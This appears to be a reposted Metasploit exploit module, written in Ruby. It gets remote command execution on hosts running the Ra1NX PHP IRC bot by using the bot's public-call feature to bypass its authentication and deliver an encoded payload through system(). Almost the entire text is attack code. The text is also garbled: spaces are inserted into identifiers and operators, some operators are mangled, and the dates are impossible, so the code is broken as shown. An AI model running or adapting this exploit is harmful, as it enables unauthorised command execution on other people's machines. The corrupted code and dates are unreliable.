& Quot; Ra1NX & quot; PHP Bot pubcall performs remote code execution by bypassing authentication

# Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution # date: March 24,201 3 # Author: bwall #: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0 # Affected versions: v2.0 # Test Platform: Ubuntu require 'msf/core' class Metasploit3 <msf: Exploit: Remote include Msf: Exploit: Remote :: tcp def initialize (info ={}) super (update_info (info, 'name' => '"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution ', 'description' => % q {This module allows remote command execution on the php irc bot Ra1NX by using the public call feature in private message to covertly bypass the authentication system .}, 'author' => ['bwall <bwall [at] openbwall.com> '# Ra1NX analysis and Metasploit module], 'license' => MSF_LICENSE, 'references '=> ['url ',' https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot '], ['Url ',' https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0 '], ['Url ',' http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b '], 'Platform' => ['unix', 'win'], 'arch '=> ARCH_CMD, 'payload' => {'space' => 344, 'badchars' => '', 'disablenops '=> true, 'compat' => {'payloadtype' => 'cmd ',}}, 'targets' => [['ra1nx ', {}], 'privileged' => false, 'disclosuredate' => 'March 24 1234 ', 'defaulttarget' => 0) register_options ([Opt: RPORT (6667), OptString. new ('irc _ password', [false, 'irc Connection password', '']), O PtString. new ('Nick ', [true, 'irc nickname', 'msf _ user']), OptString. new ('rnick ', [true, 'nickname of Target IRC Bot', 'jhl1 ']), OptString. new ('php _ EXEC ', [true, 'function used to call payload', 'system'])], self. class) end def check connect response = register (sock) if response = ~ /463/or response = ~ /464/print_error ("# {rhost }:# {rport}-Connection to the IRC Server not allowed") return Exploit: CheckCode: Unknown end confirm_string = rand_text_alpha (8) response = send_msg (sock, "PRIVMSG # {datastore ['rnick ']}: # {datastore ['rnick ']} @ msg # {datastore ['Nick']} # {confirm_string} \ r \ n ") print response quit (sock) disconnect if response = ~ /# {Confirm_string}/return Exploit: CheckCode: Vulnerable else return Exploit: CheckCode: Safe end def send_msg (sock, data) sock. put (data) data = "" begin read_data = sock. get_once (-1, 1) while not read_data.nil? Data <read_data = sock. get_once (-1, 1) end rescue EOFError end data end def register (sock) msg = "" if datastore ['irc _ password'] and not datastore ['irc _ password']. empty? Msg <"PASS # {datastore ['irc _ password']} \ r \ n" end if datastore ['Nick ']. length> 9 nick = rand_text_alpha (9) print_error ("The nick is longer than 9 characters, using # {nick }") else nick = datastore ['Nick '] end msg <"NICK # {NICK} \ r \ n" msg <"USER # {nick }#{ Rex: Socket. source_address (rhost) }#{ rhost }:# {nick} \ r \ n "response = send_msg (sock, msg) return response end def ra1nx_command (sock) encoded = Payload. encoded command_msg = "PRIVMSG # {datastore ['rnick ']}: # {datastore ['rnick '] }## {datastore ['php _ EXEC'] }#{ encoded} \ r \ n "response = send_msg (sock, command_msg) return response end def quit (sock) quit_msg = "QUIT: bye \ r \ n" sock. put (quit_msg) end def exploit connect print_status ("# {rhost }:#{ rport}-Registering with the IRC Server... ") response = register (sock) if response = ~ /463/or response = ~ /464/print_error ("# {rhost }:# {rport}-Connection to the IRC Server not allowed") return end print_status ("# {rhost }: # {rport}-Exploiting the Ra1NX bot... ") ra1nx_command (sock) quit (sock) disconnect end